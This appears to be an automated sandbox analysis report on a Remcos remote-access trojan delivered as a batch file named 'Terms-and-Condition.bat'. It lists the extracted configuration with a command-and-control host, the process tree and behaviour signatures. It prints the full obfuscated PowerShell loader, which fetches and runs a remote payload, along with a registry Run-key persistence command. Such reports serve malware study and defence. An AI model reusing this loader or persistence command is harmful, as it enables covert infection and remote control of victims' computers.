Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-12-2024 20:14
Static task
static1
Behavioral task
behavioral1
Sample
Terms-and-Condition.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Terms-and-Condition.bat
Resource
win10v2004-20241007-en
General
-
Target
Terms-and-Condition.bat
-
Size
4KB
-
MD5
f4558513a6b43a0c642449a5ce6eab7e
-
SHA1
cca4c3cf262154b5e80b14534b6b71af32850c52
-
SHA256
c3cf8f1785584a2b30097bc9917f260b397cc3bb5bc2bca54f9f4465ce2a3e0f
-
SHA512
6b34a6892f948d43abf212f4720f8a5d2aad8ad490ef6e262997fd6d5df6e51f99e60b7888673349b8d717afe7c9805966d126ec9c80b8e6c154fdd505eb4fbf
-
SSDEEP
96:9R6Ry59SGQl5PF7NuMDV5H02EIzBj6O7AFdbMAIv8k3ACoRDSDA6AcdAMLASDAZZ:D6RyO95PVNzDH02EIzBj6KAFdbMAIv/m
Malware Config
Extracted
remcos
OkX73654Jue
www.hrtgm.com:5977
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
KX73640opWe-WS9CAV
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 9 IoCs
flow pid Process 6 2028 powershell.exe 20 4980 powershell.exe 22 4980 powershell.exe 28 4980 powershell.exe 42 4980 powershell.exe 46 4980 powershell.exe 50 4980 powershell.exe 54 4980 powershell.exe 55 4980 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2028 powershell.exe 4980 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Taljerebene = "%Nauseated% -windowstyle 1 $Eschynite=(gp -Path 'HKCU:\\Software\\Hemiepes\\').Knoglemarvsprve;%Nauseated% ($Eschynite)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4980 powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 4980 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 396 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2028 powershell.exe 2028 powershell.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2028 powershell.exe Token: SeDebugPrivilege 4980 powershell.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2268 wrote to memory of 2028 2268 cmd.exe 83 PID 2268 wrote to memory of 2028 2268 cmd.exe 83 PID 4980 wrote to memory of 1064 4980 powershell.exe 93 PID 4980 wrote to memory of 1064 4980 powershell.exe 93 PID 4980 wrote to memory of 1064 4980 powershell.exe 93 PID 1064 wrote to memory of 396 1064 cmd.exe 96 PID 1064 wrote to memory of 396 1064 cmd.exe 96 PID 1064 wrote to memory of 396 1064 cmd.exe 96
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Terms-and-Condition.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden " <#Enecellens Lynkrigenes Polychasial Hedyphane #>;$Valgkongedmmets36='boulangerite';<#Forvaltningsafgrelse Spinneret Unwrapper Overspaciously stonifiable Cotyliscus #>; function Layovers($Honkers){If ($host.DebuggerEnabled) {$Ruineredes++;}$Trstprmies=$Afsminkningerne+$Honkers.'Length'-$Ruineredes; for ( $Faveolus=2;$Faveolus -lt $Trstprmies;$Faveolus+=3){$Bilindustris=$Faveolus;$storblomstredes+=$Honkers[$Faveolus];$Energimngders='Flokinstinkterne';}$storblomstredes;}function Photonephograph($Springfyrenes){ . ($Prsidentiel) ($Springfyrenes);}$Quisquilious=Layovers ',rMD o iz.riFolralStaor/Sc ';$Dominic=Layovers ' ST Al Ks G1La2El ';$Crepenylonen='Sk[ oNPoETaT,r.ous iEU Rn.v uIBeCSaEstp ronoiBrn et gmMiA oNLiADeg.reEnRMe]Ar: R:OfSD E cPru Dr aI GTF y epoprPoOKitCho Lc.voCoL M=H $ LDFoOCaMStI enPuIWaCKo ';$Quisquilious+=Layovers ' 5 n.Cy0Ci y(RhW,eiKon id hoTzwFrs g RN tTLu Sn1,n0 b.Ko0Tr; C eW ei An a6 G4 p;T SyxEr6ha4Ka; , S,rU v .:Sk1Sp3U 1 T.Se0 e) e CaGGleUdcLak omo/Du2Un0 t1Ne0B.0Py1S 0Tr1Ma RFRii rSkeTefFuo,oxsy/Fo1Ca3Ko1Cr..o0 P ';$Faveolusndividualisterne=Layovers ' BU aSc,eE ram- ASmGNoe anMiTS, ';$Modifikationer=Layovers 'HahRet itg.pM.sMo:Cu/ /U w RwAiwMa.,otEla,an ekDesEpc Ph.kud t Cz.l.DaoUdr CgDj/Scd ioGnwAgn tl ochaH dkl/ PHscaAbrKrm.aoManb.ines,de Ur BiBynSkg.usGenMidSpr ai Kn SgHe.M lKozTahAc ';$Scratchiness=Layovers 'Ta> k ';$Prsidentiel=Layovers 'ErI TEK.XAd ';$Envelopment='Acridium';$Faveolusnheritability='\Spitchcocking.Rad';Photonephograph (Layovers 'Bl$ RgBel OUnB MaAcLPa:MaAFesKlcRee NRI t Aa iE,N.om eE,nN ,tBr=A $BieUnn PV S:LaAHaP p DAeaA TFoASe+Pr$BafExa,nv E .OP.LriUIns .NInhfoebaRSfIGnTRoa,gbHjI mlSoICltBayVe ');Photonephograph (Layovers ' ,$E G nLReoBoB haHaLPr:PebMoaNogSkVRee LJswe i=Af$Inm eoHeDPei UfFoifokP aSot.vICoOMeN FE Sr e. iS,ap kL EIGrTM.(En$ ,s mcDeR PA,wThlCL hFyITtN lEtos .s,l),a ');Photonephograph (Layovers $Crepenylonen);$Modifikationer=$Bagveje[0];$Krumbjet=(Layovers 'Me$Idg,ul LOHnbUnAIglRe: Mp oRSqEIsA Ns eCBleTrRG tYeaD i nF,eKaDK =AnnHjE IW A-FdOReb nj,nEFoC lTUd SksGgyR,s.iTR E .MS .PoN reBetP..TrwG EGib icSaLPriC.eR.n PTM, ');Photonephograph ($Krumbjet);Photonephograph (Layovers 'Fi$HjpYarS,e.ea Cs cWie Nr NtCaa iHinBeePldSe. HBreS aS ds,eK rResUr[So$BuFReaSevTreKooPllUnu,es HnE,dStiMavSli .dStu Sa MlAdiHasHat.aeForHenTreK.] A=r,$DeQdsu Ri ls tqMuu iSul miu o.uurosMa ');$Verbaliser=Layovers ' l$HupR r IeA aUnsP cCoeE.rA,tTeaApiBrn veBad S.ThDFooB wCanDel ooH.aWhd FGeiKllSue (De$ PMHeo adafimofPliD k BaPotNoiAno ,n.ye.drCa,Ga$,xKVoaKadF r SeRajI eHerUi)Pl ';$Kadrejer=$Ascertainment;Photonephograph (Layovers 'Ol$klg ILExo,eB MaHyL,r: aTBaaKoP iP ,ECorGrSF =B.(BeTP ES S TUn-AepSpAI t DHT Af$guKUgaefDPir,eEm j KE rrTr)Sc ');while (!$Tappers) {Photonephograph (Layovers 'Sa$E,gGolNoo Sb aaPrlD : mPDeeOvj ZsKoeBrn AeMo1Af8Ve1Om= i$B tUnrReuNoeAn ') ;Photonephograph $Verbaliser;Photonephograph (Layovers ' SSVaTR,ABlRKoT r- SUnL reBaeRepSt Fo4D ');Photonephograph (Layovers 'G $Nag ClInOprB lARolko: at cA EPPlpPaeA R S n=Fo(MatMtEL S PTU - sp AArTSuhRe sq$chk ea ,DTerA E Rj FeF rDe)Ke ') ;Photonephograph (Layovers 'Co$NugColReo Rb Ta ,L,f:fisF,Ts,ANabA.EtrLHosL TInoPiLBuELosf =Un$JvGRaLOpoa bDgAKaLDo:G,SstNPaDOseTiRF R aiSqVA n ViCrNPogAnE EN sNd2.f3B 7To+St+Af%Po$OpbUnaUdG,iv Se NJ eCo. CcCroEnUFoNI THa ') ;$Modifikationer=$Bagveje[$Stabelstoles];}$Harmonite=331430;$Mesometrium173=28628;Photonephograph (Layovers 'Bo$OvGTaL.foinBUaa BlBa:udI .RBlRGdE ivKuoUrcheA eB ol iYOu An=.e Ng jeFeTBa- Nc To .NClT.lEFoN ot G E.$ AkWhaFaDKrREgePlJSvE CrSu ');Photonephograph (Layovers 'D $C,gD,lInoVebBoaHal .: UIM sFlo.es.xt,oaSecBry.d M.= Re[T SBoy ysR,tEkeSkm a. CLeoAfnPrvEpeSirint u]Re: g: uFS rDuoT,mSmBKeaIns MeSt6 H4V,SAst arM i LnMogIn(Tr$N IIlrEfrEle AvUno,tcHoa.ubStlB.ySp) ');Photonephograph (Layovers 'Us$I Gc.LSeOUrbHyAAsl o:C.SMoPunAnoLEntsmNRnI anHag SMiP rS OpecN,eCosKaSEne aRLanV EHaSRa K=Me In[,pSEuYbiS ,T ,E ,mIr. rT NEAbX otMu. SeTonStcTaoHoD IsyNChgA,] ,:T,:foAHjs tC ,IPai e.T G eEs T S ITfrR TIU.nkrGs,(Fr$ oi ,STrORisH.TStA .c,nYHu)D ');Photonephograph (Layovers ',r$ uGCoL UonaB rA SlTe:EqAsif kDiO FRMitc n,eiHan ogshsFa=ou$SesEdpK,ADkLT T rnF,IF n PGS S QPApR aopicO.eUnSGeS .EBoR hnSaEDesM..SpsejuTiBBaS MtkoRLoi mNN g V(Gr$TrHC AD r ZmSto nn,ei PtPlEMu,me$ am WeP s Oo iM,aEPaT,lRSaI iU omUn1Si7 H3Bh)p ');Photonephograph $Afkortnings;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Enecellens Lynkrigenes Polychasial Hedyphane #>;$Valgkongedmmets36='boulangerite';<#Forvaltningsafgrelse Spinneret Unwrapper Overspaciously stonifiable Cotyliscus #>; function Layovers($Honkers){If ($host.DebuggerEnabled) {$Ruineredes++;}$Trstprmies=$Afsminkningerne+$Honkers.'Length'-$Ruineredes; for ( $Faveolus=2;$Faveolus -lt $Trstprmies;$Faveolus+=3){$Bilindustris=$Faveolus;$storblomstredes+=$Honkers[$Faveolus];$Energimngders='Flokinstinkterne';}$storblomstredes;}function Photonephograph($Springfyrenes){ . ($Prsidentiel) ($Springfyrenes);}$Quisquilious=Layovers ',rMD o iz.riFolralStaor/Sc ';$Dominic=Layovers ' ST Al Ks G1La2El ';$Crepenylonen='Sk[ oNPoETaT,r.ous iEU Rn.v uIBeCSaEstp ronoiBrn et gmMiA oNLiADeg.reEnRMe]Ar: R:OfSD E cPru Dr aI GTF y epoprPoOKitCho Lc.voCoL M=H $ LDFoOCaMStI enPuIWaCKo ';$Quisquilious+=Layovers ' 5 n.Cy0Ci y(RhW,eiKon id hoTzwFrs g RN tTLu Sn1,n0 b.Ko0Tr; C eW ei An a6 G4 p;T SyxEr6ha4Ka; , S,rU v .:Sk1Sp3U 1 T.Se0 e) e CaGGleUdcLak omo/Du2Un0 t1Ne0B.0Py1S 0Tr1Ma RFRii rSkeTefFuo,oxsy/Fo1Ca3Ko1Cr..o0 P ';$Faveolusndividualisterne=Layovers ' BU aSc,eE ram- ASmGNoe anMiTS, ';$Modifikationer=Layovers 'HahRet itg.pM.sMo:Cu/ /U w RwAiwMa.,otEla,an ekDesEpc Ph.kud t Cz.l.DaoUdr CgDj/Scd ioGnwAgn tl ochaH dkl/ PHscaAbrKrm.aoManb.ines,de Ur BiBynSkg.usGenMidSpr ai Kn SgHe.M lKozTahAc ';$Scratchiness=Layovers 'Ta> k ';$Prsidentiel=Layovers 'ErI TEK.XAd ';$Envelopment='Acridium';$Faveolusnheritability='\Spitchcocking.Rad';Photonephograph (Layovers 'Bl$ RgBel OUnB MaAcLPa:MaAFesKlcRee NRI t Aa iE,N.om eE,nN ,tBr=A $BieUnn PV S:LaAHaP p DAeaA TFoASe+Pr$BafExa,nv E .OP.LriUIns .NInhfoebaRSfIGnTRoa,gbHjI mlSoICltBayVe ');Photonephograph (Layovers ' ,$E G nLReoBoB haHaLPr:PebMoaNogSkVRee LJswe i=Af$Inm eoHeDPei UfFoifokP aSot.vICoOMeN FE Sr e. iS,ap kL EIGrTM.(En$ ,s mcDeR PA,wThlCL hFyITtN lEtos .s,l),a ');Photonephograph (Layovers $Crepenylonen);$Modifikationer=$Bagveje[0];$Krumbjet=(Layovers 'Me$Idg,ul LOHnbUnAIglRe: Mp oRSqEIsA Ns eCBleTrRG tYeaD i nF,eKaDK =AnnHjE IW A-FdOReb nj,nEFoC lTUd SksGgyR,s.iTR E .MS .PoN reBetP..TrwG EGib icSaLPriC.eR.n PTM, ');Photonephograph ($Krumbjet);Photonephograph (Layovers 'Fi$HjpYarS,e.ea Cs cWie Nr NtCaa iHinBeePldSe. HBreS aS ds,eK rResUr[So$BuFReaSevTreKooPllUnu,es HnE,dStiMavSli .dStu Sa MlAdiHasHat.aeForHenTreK.] A=r,$DeQdsu Ri ls tqMuu iSul miu o.uurosMa ');$Verbaliser=Layovers ' l$HupR r IeA aUnsP cCoeE.rA,tTeaApiBrn veBad S.ThDFooB wCanDel ooH.aWhd FGeiKllSue (De$ PMHeo adafimofPliD k BaPotNoiAno ,n.ye.drCa,Ga$,xKVoaKadF r SeRajI eHerUi)Pl ';$Kadrejer=$Ascertainment;Photonephograph (Layovers 'Ol$klg ILExo,eB MaHyL,r: aTBaaKoP iP ,ECorGrSF =B.(BeTP ES S TUn-AepSpAI t DHT Af$guKUgaefDPir,eEm j KE rrTr)Sc ');while (!$Tappers) {Photonephograph (Layovers 'Sa$E,gGolNoo Sb aaPrlD : mPDeeOvj ZsKoeBrn AeMo1Af8Ve1Om= i$B tUnrReuNoeAn ') ;Photonephograph $Verbaliser;Photonephograph (Layovers ' SSVaTR,ABlRKoT r- SUnL reBaeRepSt Fo4D ');Photonephograph (Layovers 'G $Nag ClInOprB lARolko: at cA EPPlpPaeA R S n=Fo(MatMtEL S PTU - sp AArTSuhRe sq$chk ea ,DTerA E Rj FeF rDe)Ke ') ;Photonephograph (Layovers 'Co$NugColReo Rb Ta ,L,f:fisF,Ts,ANabA.EtrLHosL TInoPiLBuELosf =Un$JvGRaLOpoa bDgAKaLDo:G,SstNPaDOseTiRF R aiSqVA n ViCrNPogAnE EN sNd2.f3B 7To+St+Af%Po$OpbUnaUdG,iv Se NJ eCo. CcCroEnUFoNI THa ') ;$Modifikationer=$Bagveje[$Stabelstoles];}$Harmonite=331430;$Mesometrium173=28628;Photonephograph (Layovers 'Bo$OvGTaL.foinBUaa BlBa:udI .RBlRGdE ivKuoUrcheA eB ol iYOu An=.e Ng jeFeTBa- Nc To .NClT.lEFoN ot G E.$ AkWhaFaDKrREgePlJSvE CrSu ');Photonephograph (Layovers 'D $C,gD,lInoVebBoaHal .: UIM sFlo.es.xt,oaSecBry.d M.= Re[T SBoy ysR,tEkeSkm a. CLeoAfnPrvEpeSirint u]Re: g: uFS rDuoT,mSmBKeaIns MeSt6 H4V,SAst arM i LnMogIn(Tr$N IIlrEfrEle AvUno,tcHoa.ubStlB.ySp) ');Photonephograph (Layovers 'Us$I Gc.LSeOUrbHyAAsl o:C.SMoPunAnoLEntsmNRnI anHag SMiP rS OpecN,eCosKaSEne aRLanV EHaSRa K=Me In[,pSEuYbiS ,T ,E ,mIr. rT NEAbX otMu. SeTonStcTaoHoD IsyNChgA,] ,:T,:foAHjs tC ,IPai e.T G eEs T S ITfrR TIU.nkrGs,(Fr$ oi ,STrORisH.TStA .c,nYHu)D ');Photonephograph (Layovers ',r$ uGCoL UonaB rA SlTe:EqAsif kDiO FRMitc n,eiHan ogshsFa=ou$SesEdpK,ADkLT T rnF,IF n PGS S QPApR aopicO.eUnSGeS .EBoR hnSaEDesM..SpsejuTiBBaS MtkoRLoi mNN g V(Gr$TrHC AD r ZmSto nn,ei PtPlEMu,me$ am WeP s Oo iM,aEPaT,lRSaI iU omUn1Si7 H3Bh)p ');Photonephograph $Afkortnings;"1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Taljerebene" /t REG_EXPAND_SZ /d "%Nauseated% -windowstyle 1 $Eschynite=(gp -Path 'HKCU:\Software\Hemiepes\').Knoglemarvsprve;%Nauseated% ($Eschynite)"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Taljerebene" /t REG_EXPAND_SZ /d "%Nauseated% -windowstyle 1 $Eschynite=(gp -Path 'HKCU:\Software\Hemiepes\').Knoglemarvsprve;%Nauseated% ($Eschynite)"3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:396
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
468KB
MD580b863115b52c1af7a1592cdc685a392
SHA1eb0f7c549ed3abf79118147b3efb523257709618
SHA2568c3be6b1af6d45b1496c5701a53e0701dd4ea4914ac16b5f8e56bdf200060f6a
SHA51281ee19604b6970417b90fa5c62a37a3ef951d8b2404566c61f5714b4292bf60b4bfaceb41a4032cf86c18f8f810e2735c6e29d26774cd6969bdf329213e2fd29